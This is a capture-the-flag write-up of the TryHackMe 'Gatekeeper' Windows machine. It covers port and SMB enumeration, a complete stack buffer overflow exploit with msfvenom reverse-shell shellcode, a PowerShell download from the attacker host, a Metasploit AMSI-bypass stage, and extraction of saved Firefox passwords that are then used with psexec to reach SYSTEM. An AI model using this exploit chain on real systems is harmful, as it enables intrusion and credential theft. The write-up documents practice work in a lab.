u915

Daniel Cano MerchΓ‘n - Hacking & Tech

Writeup Tryhackme Gatekeeper

Writeup about the Tryhackme machine Gatekeeper.

0 - Basic info

Unknown machine, black box

1 - Reconnaissance and enumeration

Quick scan

nmap -p- --open -T5 -v 10.10πŸ˜„ -n -Pn -oG ports.txt
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-04 18:50 CEST
Initiating Connect Scan at 18:50
Scanning 10.10πŸ˜„ [65535 ports]
Discovered open port 135/tcp on 10.10πŸ˜„
Discovered open port 3389/tcp on 10.10πŸ˜„
Discovered open port 445/tcp on 10.10πŸ˜„
Discovered open port 139/tcp on 10.10πŸ˜„
Connect Scan Timing: About 23.57% done; ETC: 18:52 (0:01:41 remaining)
Discovered open port 49152/tcp on 10.10πŸ˜„
Discovered open port 49153/tcp on 10.10πŸ˜„
Connect Scan Timing: About 44.58% done; ETC: 18:52 (0:01:16 remaining)
Connect Scan Timing: About 66.59% done; ETC: 18:52 (0:00:46 remaining)
Discovered open port 31337/tcp on 10.10πŸ˜„
Completed Connect Scan at 18:52, 154.43s elapsed (65535 total ports)
Nmap scan report for 10.10πŸ˜„
Host is up (0.066s latency).
Not shown: 38084 filtered ports, 27444 closed ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
31337/tcp open  Elite
49152/tcp open  unknown
49153/tcp open  unknown

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 154.60 seconds


Strange port 31337 service, Elite ?

Nmap deep scan

nmap -sC -sV -Pn -p$(cat ports.txt | grep -oP '\d{2,5}/open' |  tr '/open' ' '| xargs | tr ' ' ',')  10.10πŸ˜„ -oN full_scan.txt    
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-04 18:54 CEST
Stats: 0:00:17 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 57.14% done; ETC: 18:55 (0:00:12 remaining)
Nmap scan report for 10.10πŸ˜„
Host is up (0.049s latency).

PORT      STATE SERVICE            VERSION
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=gatekeeper
| Not valid before: 2021-07-03T16:47:05
|_Not valid after:  2022-01-02T16:47:05
|_ssl-date: 2021-07-04T16:57:01+00:00; -37s from scanner time.
31337/tcp open  Elite?
| fingerprint-strings: 
|   FourOhFourRequest: 
|     Hello GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0
|     Hello
|   GenericLines: 
|     Hello 
|     Hello
|   GetRequest: 
|     Hello GET / HTTP/1.0
|     Hello
|   HTTPOptions: 
|     Hello OPTIONS / HTTP/1.0
|     Hello
|   Help: 
|     Hello HELP
|   Kerberos: 
|     Hello !!!
|   LDAPSearchReq: 
|     Hello 0
|     Hello
|   LPDString: 
|     Hello 
|     default!!!
|   RTSPRequest: 
|     Hello OPTIONS / RTSP/1.0
|     Hello
|   SIPOptions: 
|     Hello OPTIONS sip:nm SIP/2.0
|     Hello Via: SIP/2.0/TCP nm;branch=foo
|     Hello From: <sip:nm@nm>;tag=root
|     Hello To: <sip:nm2@nm2>
|     Hello Call-ID: 50000
|     Hello CSeq: 42 OPTIONS
|     Hello Max-Forwards: 70
|     Hello Content-Length: 0
|     Hello Contact: <sip:nm@nm>
|     Hello Accept: application/sdp
|     Hello
|   SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|_    Hello
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port31337-TCP:V=7.91%I=7%D=7/4%Time=60E1E7EA%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,24,"Hello\x20GET\x20/\x20HTTP/1\.0\r!!!\nHello\x20\r!!!\n")%r(
SF:SIPOptions,142,"Hello\x20OPTIONS\x20sip:nm\x20SIP/2\.0\r!!!\nHello\x20V
SF:ia:\x20SIP/2\.0/TCP\x20nm;branch=foo\r!!!\nHello\x20From:\x20<sip:nm@nm
SF:>;tag=root\r!!!\nHello\x20To:\x20<sip:nm2@nm2>\r!!!\nHello\x20Call-ID:\
SF:x2050000\r!!!\nHello\x20CSeq:\x2042\x20OPTIONS\r!!!\nHello\x20Max-Forwa
SF:rds:\x2070\r!!!\nHello\x20Content-Length:\x200\r!!!\nHello\x20Contact:\
SF:x20<sip:nm@nm>\r!!!\nHello\x20Accept:\x20application/sdp\r!!!\nHello\x2
SF:0\r!!!\n")%r(GenericLines,16,"Hello\x20\r!!!\nHello\x20\r!!!\n")%r(HTTP
SF:Options,28,"Hello\x20OPTIONS\x20/\x20HTTP/1\.0\r!!!\nHello\x20\r!!!\n")
SF:%r(RTSPRequest,28,"Hello\x20OPTIONS\x20/\x20RTSP/1\.0\r!!!\nHello\x20\r
SF:!!!\n")%r(Help,F,"Hello\x20HELP\r!!!\n")%r(SSLSessionReq,C,"Hello\x20\x
SF:16\x03!!!\n")%r(TerminalServerCookie,B,"Hello\x20\x03!!!\n")%r(TLSSessi
SF:onReq,C,"Hello\x20\x16\x03!!!\n")%r(Kerberos,A,"Hello\x20!!!\n")%r(Four
SF:OhFourRequest,47,"Hello\x20GET\x20/nice%20ports%2C/Tri%6Eity\.txt%2ebak
SF:\x20HTTP/1\.0\r!!!\nHello\x20\r!!!\n")%r(LPDString,12,"Hello\x20\x01def
SF:ault!!!\n")%r(LDAPSearchReq,17,"Hello\x200\x84!!!\nHello\x20\x01!!!\n");
Service Info: Host: GATEKEEPER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 59m22s, deviation: 2h00m00s, median: -37s
|_nbstat: NetBIOS name: GATEKEEPER, NetBIOS user: <unknown>, NetBIOS MAC: 02:d6:c1:42:81:9f (unknown)
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: gatekeeper
|   NetBIOS computer name: GATEKEEPER\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-07-04T12:56:55-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-07-04T16:56:55
|_  start_date: 2021-07-04T16:46:51

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 165.30 seconds

Interesting user guest enabled.

Basic interaction with the service 31337:

nc 10.10πŸ˜„ 31337                                                                                                                                  

Hello !!!

Hello !!!

Hello !!!
Darkness
Hello Darkness!!!

Looks like the service just prints what you sent to the server, can be a vector for a buffer overflow attack.

Manual enumeration of the service 445 smb:

smbclient --no-pass -L //10.10πŸ˜„                                                                                                                                                                                                  1 β¨―

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	Users           Disk      
SMB1 disabled -- no workgroup available

Downloaded some interesting files from the share Users:

smb: \Default\> get NTUSER.DAT
getting file \Default\NTUSER.DAT of size 262144 as NTUSER.DAT (299,4 KiloBytes/sec) (average 106,0 KiloBytes/sec)
smb: \Default\> get NTUSER.DAT.LOG
getting file \Default\NTUSER.DAT.LOG of size 1024 as NTUSER.DAT.LOG (6,8 KiloBytes/sec) (average 100,6 KiloBytes/sec)
smb: \Default\> get NTUSER.DAT.LOG1
getting file \Default\NTUSER.DAT.LOG1 of size 189440 as NTUSER.DAT.LOG1 (362,7 KiloBytes/sec) (average 142,4 KiloBytes/sec)
smb: \Default\> get NTUSER.DAT.LOG2
getting file \Default\NTUSER.DAT.LOG2 of size 0 as NTUSER.DAT.LOG2 (0,0 KiloBytes/sec) (average 135,5 KiloBytes/sec)


smb: \Share\> ls
  .                                   D        0  Fri May 15 03:58:07 2020
  ..                                  D        0  Fri May 15 03:58:07 2020
  gatekeeper.exe                      A    13312  Mon Apr 20 07:27:17 2020

		7863807 blocks of size 4096. 3879008 blocks available
smb: \Share\> get gatekeeper.exe
getting file \Share\gatekeeper.exe of size 13312 as gatekeeper.exe (7,7 KiloBytes/sec) (average 7,7 KiloBytes/sec)

Passing strings to the file trying to find some interesting inside:

strings gatekeeper.exe 
KERNEL32.dll
WSAStartup failed: %d
31337
getaddrinfo failed: %d
socket() failed with error: %ld
bind() failed with error: %d
listen() failed with error: %ld
[+] Listening for connections.
accept failed: %d
Received connection from remote host.
Connection handed off to handler thread.
Please send shorter lines.
Bye!
[!] recvbuf exhausted. Giving up.
Client disconnected.
recv() failed: %d.
Bytes received: %d
exit
Client requested exit.
Hello %s!!!
send failed: %d
Bytes sent: %d
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel level='asInvoker' uiAccess='false' />
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>

Also I used nmap with the script vuln to check if there are critical vulnerabilities. This is the redacted trace:

3389/tcp  open  ssl/ms-wbt-server?
| rdp-vuln-ms12-020: 
|   VULNERABLE:
|   MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0152
|     Risk factor: Medium  CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to cause a denial of service.
|           
|     Disclosure date: 2012-03-13
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152
|       http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|   
|   MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0002
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to execute arbitrary code on the targeted system.
|           
|     Disclosure date: 2012-03-13
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002
|_      http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown: 

MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability with a CVSS of 9.3.

The poc can be found here

https://www.exploit-db.com/exploits/18606

But I could not find the RCE exploit code only a simple PoC and a DoS attack that is unwanted. The PoC running was this, nothing useful:

nc 10.10πŸ˜„ 3389 < 18606.dat 
οΏ½4
οΏ½οΏ½<οΏ½οΏ½οΏ½οΏ½5οΏ½  

Coming back to the misterious port 31337 I created a string of 5000 chars and the string was sent to the server… crashes…

2 - Vulnerability Identification

Digging into the crash generated with the 5000 chars strings I started to study more in detail the executable file.

I used the same windows 7 tryhackme machine for the stack buffer overflow preparation. With the .exe gatekeeper.exe uploaded and running

alt text

Started sending 500 chars and directly crashed, so I tunned the char generation to a small amount chars per iteration

#!/bin/python3

from pwn import *

HOST = "10.10πŸ˜„"
PORT = "31337"
LIMIT = 60
CHARS_FUZZ = 50
r = remote(HOST,PORT)
for x in range (1,LIMIT):
	print("[+] SENDING"+str(CHARS_FUZZ*x)+" CHARS, COUNTER:"+str(x))
	r.send("A"*CHARS_FUZZ*x+"\r\n")
	if (r.recvline(timeout=4))==b'':
		print("[!] KO")
		r.clean()
		r.close()
		break
	r.clean()
python3 fuzz1.py
[+] Opening connection to 10.10πŸ˜„ on port 31337: Done
[+] SENDING50 CHARS, COUNTER:1
[+] SENDING100 CHARS, COUNTER:2
[+] SENDING150 CHARS, COUNTER:3
[!] KO
[*] Closed connection to 10.10πŸ˜„ port 31337

alt text

The server crashes with 150 chars.

3 - Exploit development

With this information I started analyzing the executable with Inmunity Debugger, creating a new pattern of 150 chars when the server crashes:

msf-pattern_create -l 150
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9

Using nc to send the pattern. I got the EIP 39654138

msf-pattern_offset -l 150 -q 39654138                                                                                                                                                                                                 1 β¨―
[*] Exact match at offset 146

So the exact offset is 146

Setting up the Mona working directory:

!mona config -set workingfolder C:\Users\admin\Desktop\%p

Searching a valid memory address without protection:

!mona modules
!mona find -s "\xff\xe4"
0x080414c3 : "\xff\xe4" |  {PAGE_EXECUTE_READ} [gatekeeper.exe] ASLR: False, Rebase: False, SafeSEH: True, OS: False, v-1.0- (C:\Users\admin\Desktop\gatekeeper.exe)
0x080416bf : "\xff\xe4" |  {PAGE_EXECUTE_READ} [gatekeeper.exe] ASLR: False, Rebase: False, SafeSEH: True, OS: False, v-1.0- (C:\Users\admin\Desktop\gatekeeper.exe)

Parsing the last one to little endian:

080416bf -> “\xbf\x16\x04\x08”

Generating the badchar array without \x00 with Mona

!mona bytearray -cpb \x00

Debugging the badchars with the following python script:

#!/bin/python3

from pwn import *

HOST = "10.10πŸ˜„"
PORT = "31337"
offset = 146
fuzz = "A"*offset
badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
r = remote(HOST,PORT)

print("[+] SENDING")
r.send(str(fuzz)+"BBBB"+str(badchars)+"\r\n")
if (r.recvline(timeout=4))==b'':
	print("[!] KO")
	r.clean()
	r.close()
!mona compare -a 0012FEB8 -f C:\Users\admin\Desktop\gatekeeper\bytearray.bin

First compare reports that \x01 is also a bad char, so generating again the bytearray

!mona bytearray -cpb \x00\x01

Now I got 0a as a bad char too \x0a repeating the process with the badchar \x0a works. No more badchars are required:

So the final bad char list is \x00\x01\x0a. Using this information with msfvenom to generate a payload:

msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10πŸ˜„ LPORT=4433 -f c -v shellcode -b '\x00\x01\x0a' EXITFUNC=thread 
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1506 bytes
unsigned char shellcode[] = 
"\xba\x46\xae\xbc\xf1\xd9\xd0\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
"\x52\x83\xe8\xfc\x31\x50\x0e\x03\x16\xa0\x5e\x04\x6a\x54\x1c"
"\xe7\x92\xa5\x41\x61\x77\x94\x41\x15\xfc\x87\x71\x5d\x50\x24"
"\xf9\x33\x40\xbf\x8f\x9b\x67\x08\x25\xfa\x46\x89\x16\x3e\xc9"
"\x09\x65\x13\x29\x33\xa6\x66\x28\x74\xdb\x8b\x78\x2d\x97\x3e"
"\x6c\x5a\xed\x82\x07\x10\xe3\x82\xf4\xe1\x02\xa2\xab\x7a\x5d"
"\x64\x4a\xae\xd5\x2d\x54\xb3\xd0\xe4\xef\x07\xae\xf6\x39\x56"
"\x4f\x54\x04\x56\xa2\xa4\x41\x51\x5d\xd3\xbb\xa1\xe0\xe4\x78"
"\xdb\x3e\x60\x9a\x7b\xb4\xd2\x46\x7d\x19\x84\x0d\x71\xd6\xc2"
"\x49\x96\xe9\x07\xe2\xa2\x62\xa6\x24\x23\x30\x8d\xe0\x6f\xe2"
"\xac\xb1\xd5\x45\xd0\xa1\xb5\x3a\x74\xaa\x58\x2e\x05\xf1\x34"
"\x83\x24\x09\xc5\x8b\x3f\x7a\xf7\x14\x94\x14\xbb\xdd\x32\xe3"
"\xbc\xf7\x83\x7b\x43\xf8\xf3\x52\x80\xac\xa3\xcc\x21\xcd\x2f"
"\x0c\xcd\x18\xff\x5c\x61\xf3\x40\x0c\xc1\xa3\x28\x46\xce\x9c"
"\x49\x69\x04\xb5\xe0\x90\xcf\xb0\xfd\x9e\x7b\xad\xff\x9e\x92"
"\x7c\x89\x78\xfe\x6e\xdf\xd3\x97\x17\x7a\xaf\x06\xd7\x50\xca"
"\x09\x53\x57\x2b\xc7\x94\x12\x3f\xb0\x54\x69\x1d\x17\x6a\x47"
"\x09\xfb\xf9\x0c\xc9\x72\xe2\x9a\x9e\xd3\xd4\xd2\x4a\xce\x4f"
"\x4d\x68\x13\x09\xb6\x28\xc8\xea\x39\xb1\x9d\x57\x1e\xa1\x5b"
"\x57\x1a\x95\x33\x0e\xf4\x43\xf2\xf8\xb6\x3d\xac\x57\x11\xa9"
"\x29\x94\xa2\xaf\x35\xf1\x54\x4f\x87\xac\x20\x70\x28\x39\xa5"
"\x09\x54\xd9\x4a\xc0\xdc\xf9\xa8\xc0\x28\x92\x74\x81\x90\xff"
"\x86\x7c\xd6\xf9\x04\x74\xa7\xfd\x15\xfd\xa2\xba\x91\xee\xde"
"\xd3\x77\x10\x4c\xd3\x5d";

Script with the msfvenom payload:

#!/bin/python3

from pwn import *

HOST = "10.10πŸ˜„"
PORT = "31337"
offset = 146
fuzz = "A"*offset
shellcode = ("\xba\x46\xae\xbc\xf1\xd9\xd0\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
"\x52\x83\xe8\xfc\x31\x50\x0e\x03\x16\xa0\x5e\x04\x6a\x54\x1c"
"\xe7\x92\xa5\x41\x61\x77\x94\x41\x15\xfc\x87\x71\x5d\x50\x24"
"\xf9\x33\x40\xbf\x8f\x9b\x67\x08\x25\xfa\x46\x89\x16\x3e\xc9"
"\x09\x65\x13\x29\x33\xa6\x66\x28\x74\xdb\x8b\x78\x2d\x97\x3e"
"\x6c\x5a\xed\x82\x07\x10\xe3\x82\xf4\xe1\x02\xa2\xab\x7a\x5d"
"\x64\x4a\xae\xd5\x2d\x54\xb3\xd0\xe4\xef\x07\xae\xf6\x39\x56"
"\x4f\x54\x04\x56\xa2\xa4\x41\x51\x5d\xd3\xbb\xa1\xe0\xe4\x78"
"\xdb\x3e\x60\x9a\x7b\xb4\xd2\x46\x7d\x19\x84\x0d\x71\xd6\xc2"
"\x49\x96\xe9\x07\xe2\xa2\x62\xa6\x24\x23\x30\x8d\xe0\x6f\xe2"
"\xac\xb1\xd5\x45\xd0\xa1\xb5\x3a\x74\xaa\x58\x2e\x05\xf1\x34"
"\x83\x24\x09\xc5\x8b\x3f\x7a\xf7\x14\x94\x14\xbb\xdd\x32\xe3"
"\xbc\xf7\x83\x7b\x43\xf8\xf3\x52\x80\xac\xa3\xcc\x21\xcd\x2f"
"\x0c\xcd\x18\xff\x5c\x61\xf3\x40\x0c\xc1\xa3\x28\x46\xce\x9c"
"\x49\x69\x04\xb5\xe0\x90\xcf\xb0\xfd\x9e\x7b\xad\xff\x9e\x92"
"\x7c\x89\x78\xfe\x6e\xdf\xd3\x97\x17\x7a\xaf\x06\xd7\x50\xca"
"\x09\x53\x57\x2b\xc7\x94\x12\x3f\xb0\x54\x69\x1d\x17\x6a\x47"
"\x09\xfb\xf9\x0c\xc9\x72\xe2\x9a\x9e\xd3\xd4\xd2\x4a\xce\x4f"
"\x4d\x68\x13\x09\xb6\x28\xc8\xea\x39\xb1\x9d\x57\x1e\xa1\x5b"
"\x57\x1a\x95\x33\x0e\xf4\x43\xf2\xf8\xb6\x3d\xac\x57\x11\xa9"
"\x29\x94\xa2\xaf\x35\xf1\x54\x4f\x87\xac\x20\x70\x28\x39\xa5"
"\x09\x54\xd9\x4a\xc0\xdc\xf9\xa8\xc0\x28\x92\x74\x81\x90\xff"
"\x86\x7c\xd6\xf9\x04\x74\xa7\xfd\x15\xfd\xa2\xba\x91\xee\xde"
"\xd3\x77\x10\x4c\xd3\x5d")

esp = "\xbf\x16\x04\x08"
nop = "\x90"*20
r = remote(HOST,PORT)

print("[+] SENDING")
r.send("A"*offset+esp+nop+str(shellcode)+"\r\n")
if (r.recvline(timeout=4))==b'':
	print("[!] KO")
	r.clean()
	r.close()

Worked on the lab machine, now pointing to the real machine:

nc -lvp 4433                                                                                                 1 β¨―
listening on [any] 4433 ...
10.10πŸ˜„: inverse host lookup failed: Unknown host
connect to [10.10πŸ˜„] from (UNKNOWN) [10.10πŸ˜„] 49204
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\natbat\Desktop>whoami
whoami
gatekeeper\natbat

Getting the flag:

C:\Users\natbat\Desktop>type user.txt.txt
type user.txt.txt
{H4lfπŸ˜„}

The buffer overflow in this room is credited to Justin Steven and his 
"dostackbufferoverflowgood" program.  Thank you!

Also there is a .bat file:

C:\Users\natbat\Desktop>type gatekeeperstart.bat
type gatekeeperstart.bat
@echo off
:start 
start /w C:\Users\natbat\Desktop\gatekeeper.exe
::Wait 90 seconds before restarting.
TIMEOUT /T 5
GOTO:Start

I uploaded winpeas in bat mode to enumerate better the windows machine

powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10πŸ˜„:7777/bat.bat','bat.bat')" 


 [+] Files in registry that may contain credentials
   [i] Searching specific files that may contains credentials.
   [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files
Looking inside HKCU\Software\ORL\WinVNC3\Password
Looking inside HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4/password
Looking inside HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\WinLogon
    DefaultDomainName    REG_SZ    
    DefaultUserName    REG_SZ    
Looking inside HKLM\SYSTEM\CurrentControlSet\Services\SNMP
Looking inside HKCU\Software\TightVNC\Server
Looking inside HKCU\Software\SimonTatham\PuTTY\Sessions
Looking inside HKCU\Software\OpenSSH\Agent\Keys



C:\Users\natbat\AppData\Roaming\Mozilla\Firefox\Profiles\ljfn812a.default-release\places.sqlite
C:\Users\natbat\AppData\Roaming\Mozilla\Firefox\Profiles\ljfn812a.default-release\key4.db
C:\Windows\Panther\unattend.xml
C:\Windows\Panther\setupinfo
C:\Windows\winsxs\amd64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.1.7601.17514_none_6f0f7833cb71e18d\appcmd.exe
C:\Windows\winsxs\wow64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.1.7601.17514_none_79642285ffd2a388\appcmd.exe

I was stuck for a while… and then I decided to upgrade my reverse shell with meterpreter. I was looking around without any ideas and I went back to the winpeas script because the firefox folder is not common also I found a script to extract from the firefox folder:

msf6 exploit(multi/script/web_delivery) > 
[*] 10.10πŸ˜„    web_delivery - Delivering AMSI Bypass (939 bytes)
[*] 10.10πŸ˜„    web_delivery - Delivering Payload (1904 bytes)
[*] Sending stage (175174 bytes) to 10.10πŸ˜„
[*] Meterpreter session 13 opened (10.10πŸ˜„:9990 -> 10.10πŸ˜„:49249) at 2021-07-04 23:49:12 +0200


msf6 post(multi/gather/firefox_creds) > set SESSION 13
SESSION => 13
msf6 post(multi/gather/firefox_creds) > exploit

[-] Error loading USER S-1-5-21-663372427-3699997616-3390412905-1000: Hive could not be loaded, are you Admin?
[*] Checking for Firefox profile in: C:\Users\natbat\AppData\Roaming\Mozilla\

[*] Profile: C:\Users\natbat\AppData\Roaming\Mozilla\Firefox\Profiles\ljfn812a.default-release
[+] Downloaded cert9.db: /home/u915/.msf4/loot/20210704235048_default_10.10πŸ˜„_ff.ljfn812a.cert_415838.bin
[+] Downloaded cookies.sqlite: /home/u915/.msf4/loot/20210704235049_default_10.10πŸ˜„_ff.ljfn812a.cook_161103.bin
[+] Downloaded key4.db: /home/u915/.msf4/loot/20210704235050_default_10.10πŸ˜„_ff.ljfn812a.key4_832146.bin
[+] Downloaded logins.json: /home/u915/.msf4/loot/20210704235051_default_10.10πŸ˜„_ff.ljfn812a.logi_045138.bin

[*] Profile: C:\Users\natbat\AppData\Roaming\Mozilla\Firefox\Profiles\rajfzh3y.default

[*] Post module execution completed

Again I was hitting a wall because I did not know what to do with the firefox files. Until I discovered this:

git clone https://github.com/unode/firefox_decrypt.git

python3 firefox_decrypt.py /home/u915/Escritorio/tryhackme/gatekeeper/firefox/                                12 β¨―
2021-07-05 00:00:56,778 - WARNING - profile.ini not found in /home/u915/Escritorio/tryhackme/gatekeeper/firefox/
2021-07-05 00:00:56,779 - WARNING - Continuing and assuming '/home/u915/Escritorio/tryhackme/gatekeeper/firefox/' is a profile location

Website:   https://creds.com
Username: 'mayor'
Password: '8CL7πŸ˜„'

Using the credentials with impacket:

/usr/bin/impacket-psexec "mayor:8CL7:smile:"@10.10πŸ˜„                                            130 β¨―
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.10πŸ˜„.....
[*] Found writable share ADMIN$
[*] Uploading file WFJAEcWP.exe
[*] Opening SVCManager on 10.10πŸ˜„.....
[*] Creating service yHQT on 10.10πŸ˜„.....
[*] Starting service yHQT.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
nt authority\system

Finally rooted. Flag looted:


C:\Users\mayor\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 3ABE-D44B

 Directory of C:\Users\mayor\Desktop

05/14/2020  09:58 PM    <DIR>          .
05/14/2020  09:58 PM    <DIR>          ..
05/14/2020  09:21 PM                27 root.txt.txt
               1 File(s)             27 bytes
               2 Dir(s)  15,031,672,832 bytes free

C:\Users\mayor\Desktop>type root.txt.txt
{Th3_πŸ˜„}

Good machine. The hardest part was thinking about the firefox folder because on the first minutes I did not put attention on the folder, I expected vulnerable flaws on Winpeas.


Thanks for reading!